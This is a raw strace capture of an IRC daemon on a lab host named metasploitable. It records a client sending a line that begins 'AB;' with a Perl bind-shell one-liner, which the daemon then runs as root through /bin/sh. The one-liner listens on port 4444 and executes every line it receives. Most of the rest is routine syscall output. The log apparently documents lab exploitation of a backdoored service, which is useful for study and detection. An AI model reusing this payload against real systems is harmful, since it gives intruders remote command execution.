4519  07:20:17.416620 select(1024, [2 3 4 7 9], [], NULL, {0, 660000}) = 1 (in [7], left {0, 530000})

4519  07:20:17.543106 clock_gettime(CLOCK_MONOTONIC, {1627, 360128526}) = 0

4519  07:20:17.543130 recv(7, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 71

4519  07:20:17.543163 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543182 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543197 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543212 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543226 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543241 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543255 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543269 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543283 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543297 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543311 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543325 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543339 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543353 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543367 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543381 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543395 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543409 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543424 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543438 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543452 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543466 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.543482 time(NULL)        = 1495624817

4519  07:20:17.543492 time(NULL)        = 1495624817

4519  07:20:17.543520 gettimeofday({1495624817, 543525}, NULL) = 0

4519  07:20:17.543534 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:20:17.543564 clock_gettime(CLOCK_MONOTONIC, {1627, 360577088}) = 0

4519  07:20:17.543575 gettimeofday({1495624817, 543579}, NULL) = 0

4519  07:20:17.543586 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 970000})

4519  07:20:17.579005 clock_gettime(CLOCK_MONOTONIC, {1627, 396027535}) = 0

4519  07:20:17.579028 accept(2, 0, NULL) = 5

4519  07:20:17.579064 getpeername(5, {sa_family=AF_INET, sin_port=htons(35049), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:20:17.579105 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:17.579119 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:17.579133 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:20:17.579146 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:20:17.579157 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:20:17.579169 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:20:17.579181 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:20:17.579198 clock_gettime(CLOCK_MONOTONIC, {1627, 396211809}) = 0

4519  07:20:17.579211 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:20:17.579226 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:20:17.579236 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:20:17.579246 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:20:17.579256 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:20:17.579282 send(6, "O\202\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:20:17.579346 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:20:17.579372 gettimeofday({1495624817, 579376}, NULL) = 0

4519  07:20:17.579384 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:20:17.587862 clock_gettime(CLOCK_MONOTONIC, {1627, 404899906}) = 0

4519  07:20:17.587901 recvfrom(6, "O\202\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\226\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:20:17.587943 close(6)          = 0

4519  07:20:17.587960 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:20:17.587975 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:20:17.588111 time(NULL)        = 1495624817

4519  07:20:17.588142 time(NULL)        = 1495624817

4519  07:20:17.588154 gettimeofday({1495624817, 588158}, NULL) = 0

4519  07:20:17.588186 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:20:17.588295 clock_gettime(CLOCK_MONOTONIC, {1627, 405309545}) = 0

4519  07:20:17.588322 gettimeofday({1495624817, 588325}, NULL) = 0

4519  07:20:17.588352 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 790000})

4519  07:20:17.794152 clock_gettime(CLOCK_MONOTONIC, {1627, 611192764}) = 0

4519  07:20:17.794224 recv(4, "PRIVMSG  #testit Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 54

4519  07:20:17.794271 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794303 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794328 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794344 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794358 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794372 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794386 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794399 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794413 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794426 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794440 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794453 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794467 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794480 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794494 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794507 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794520 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794534 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794548 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794578 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794614 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794628 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 230000}, ...}) = 0

4519  07:20:17.794659 gettimeofday({1495624817, 794669}, NULL) = 0

4519  07:20:17.794678 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:20:17.794720 clock_gettime(CLOCK_MONOTONIC, {1627, 611733758}) = 0

4519  07:20:17.794733 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:20:17.794761 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:20:17.794782 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:20:17.794795 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:20:17.794810 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7772

7772  07:20:17.794899 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7772  07:20:17.794915 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7772  07:20:17.794925 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7772  07:20:17.794939 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7772  07:20:17.795047 brk(0)            = 0x80f9000

7772  07:20:17.795155 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.795215 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f17000

7772  07:20:17.795232 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.795249 open("/etc/ld.so.cache", O_RDONLY) = 1

7772  07:20:17.795262 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7772  07:20:17.795281 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0f000

7772  07:20:17.795292 close(1)          = 0

7772  07:20:17.795303 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.795318 open("/lib/libncurses.so.5", O_RDONLY) = 1

7772  07:20:17.795332 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7772  07:20:17.795427 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7772  07:20:17.795444 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edf000

7772  07:20:17.795457 mmap2(0xb7f0c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f0c000

7772  07:20:17.795477 close(1)          = 0

7772  07:20:17.795490 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.795504 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7772  07:20:17.795518 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7772  07:20:17.795612 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7772  07:20:17.795629 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edb000

7772  07:20:17.795651 mmap2(0xb7edd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7edd000

7772  07:20:17.795691 close(1)          = 0

7772  07:20:17.795717 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.795731 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7772  07:20:17.795745 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7772  07:20:17.795834 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7772  07:20:17.795851 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eda000

7772  07:20:17.795865 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8b000

7772  07:20:17.795876 mmap2(0xb7ed4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed4000

7772  07:20:17.795891 mmap2(0xb7ed7000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed7000

7772  07:20:17.795905 close(1)          = 0

7772  07:20:17.795927 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d8a000

7772  07:20:17.795940 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d8a6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7772  07:20:17.795995 mprotect(0xb7ed4000, 4096, PROT_READ) = 0

7772  07:20:17.796033 munmap(0xb7f0f000, 29913) = 0

7772  07:20:17.796059 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7772  07:20:17.796074 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7772  07:20:17.796093 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe3c800) = -1 ENOTTY (Inappropriate ioctl for device)

7772  07:20:17.796124 brk(0)            = 0x80f9000

7772  07:20:17.796146 brk(0x80fa000)    = 0x80fa000

7772  07:20:17.796186 brk(0x80fb000)    = 0x80fb000

7772  07:20:17.796218 getuid32()        = 0

7772  07:20:17.796231 getgid32()        = 0

7772  07:20:17.796240 geteuid32()       = 0

7772  07:20:17.796249 getegid32()       = 0

7772  07:20:17.796263 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7772  07:20:17.796277 time(NULL)        = 1495624817

7772  07:20:17.796289 brk(0x80fc000)    = 0x80fc000

7772  07:20:17.796306 brk(0x80fd000)    = 0x80fd000

7772  07:20:17.796327 open("/proc/meminfo", O_RDONLY) = 1

7772  07:20:17.796349 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7772  07:20:17.796368 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f16000

7772  07:20:17.796379 read(1, "MemTotal:      1035240 kB\nMemFree:        542244 kB\nBuffers:         64996 kB\nCached:         270876 kB\nSwapCached:          0 kB\nActive:         254336 kB\nInactive:       210456 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        542004 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4672 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52008 kB\nSlab:            16812 kB\nSReclaimable:     8592 kB\nSUnreclaim:       8220 kB\nPageTables:       1972 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7772  07:20:17.796464 close(1)          = 0

7772  07:20:17.796476 munmap(0xb7f16000, 4096) = 0

7772  07:20:17.796488 brk(0x80fe000)    = 0x80fe000

7772  07:20:17.796515 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7772  07:20:17.796528 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7772  07:20:17.796540 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7772  07:20:17.796552 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7772  07:20:17.796564 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7772  07:20:17.796576 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7772  07:20:17.796589 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7772  07:20:17.796601 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7772  07:20:17.796614 uname({sys="Linux", node="metasploitable", ...}) = 0

7772  07:20:17.796710 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7772  07:20:17.796729 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7772  07:20:17.796748 brk(0x8100000)    = 0x8100000

7772  07:20:17.796761 getcwd("/etc/unreal", 4096) = 12

7772  07:20:17.796776 getpid()          = 7772

7772  07:20:17.796793 getppid()         = 4519

7772  07:20:17.796823 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7772  07:20:17.796843 stat64("/sbin/sh", 0xbfe3c7d8) = -1 ENOENT (No such file or directory)

7772  07:20:17.796856 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7772  07:20:17.796873 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7772  07:20:17.796897 socket(PF_FILE, SOCK_STREAM, 0) = 1

7772  07:20:17.796910 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7772  07:20:17.796923 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7772  07:20:17.796944 close(1)          = 0

7772  07:20:17.796956 socket(PF_FILE, SOCK_STREAM, 0) = 1

7772  07:20:17.796966 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7772  07:20:17.796976 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7772  07:20:17.796995 close(1)          = 0

7772  07:20:17.797008 open("/etc/nsswitch.conf", O_RDONLY) = 1

7772  07:20:17.797022 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7772  07:20:17.797039 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f16000

7772  07:20:17.797050 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7772  07:20:17.797103 read(1, "", 4096) = 0

7772  07:20:17.797113 close(1)          = 0

7772  07:20:17.797123 munmap(0xb7f16000, 4096) = 0

7772  07:20:17.797179 open("/etc/ld.so.cache", O_RDONLY) = 1

7772  07:20:17.797207 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7772  07:20:17.797224 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f0f000

7772  07:20:17.797234 close(1)          = 0

7772  07:20:17.797245 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7772  07:20:17.797260 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7772  07:20:17.797274 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 